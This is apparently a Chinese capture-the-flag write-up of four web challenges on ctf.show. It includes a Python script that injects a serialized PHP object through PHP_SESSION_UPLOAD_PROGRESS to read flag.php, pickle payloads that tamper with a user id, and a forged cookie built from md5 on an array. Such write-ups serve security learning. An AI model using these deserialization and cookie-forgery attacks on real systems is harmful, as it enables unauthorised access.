目录

easy_eval 

剪刀石头布 

baby_pickle

repairman

---

easy_eval 

用script标签来绕过

剪刀石头布 

需要赢100轮🤔

右键查看源码拿到提示

一眼session反序列化

打PHP_SESSION_UPLOAD_PROGRESS

 脚本

import requests

p1 = '''a|O:4:"Game":1:{s:3:"log";s:22:"/var/www/html/flag.php";}'''
url = 'http://a543ddd6-f753-4755-9dcf-240ac649a8bc.challenge.ctf.show/'
session = requests.session()
file = {'file': (p1, 'aaa')}
data = {"PHP_SESSION_UPLOAD_PROGRESS": 123}
cookie = {'PHPSESSID': '46a13ded76233da86f438741ccf8f178'}
resp = session.post(url=url, data=data, files=file, cookies=cookie, proxies={'http': '127.0.0.1:8080'})
print(resp.text)

发包，拿到flag

baby_pickle

当id为0时可以拿到flag

先本地起个服务，先直接请求，再请求?name=Z3r4y，拿到new_rookie_info和Z3r4y_info

ccopy_reg
_reconstructor
(c__main__
Rookie
c__builtin__
object
NtR(dVname
Vnew_rookie
sVid
I2
sb.

ccopy_reg
_reconstructor
(c__main__
Rookie
c__builtin__
object
NtR(dVname
VZ3r4y
sVid
I3
sb.

 对比一下，其实就是要让I3为I1就可，sb后的.起到截断作用，id在name之后，name是我们可控的

可以在/change路由进行打入，用newname替换name

payload:

?name=Z3r4y
/change?name=WjNyNHk=&newname=WjNyNHkKc1ZpZApJMApzYi4=
/dacaiji?name=Z3r4y

 

repairman

注意到存在mode传参

令mode为0看到源码

$secret为$_COOKIE[secret]，直接引用绕过了

<?php
$config['secret'] = Array();
$secret = md5('admin'.$config['secret']);
echo $secret;
//da53eb34c1bc6ce7bbfcedf200148106

 运行结果插到cookie里，而后便可为所欲为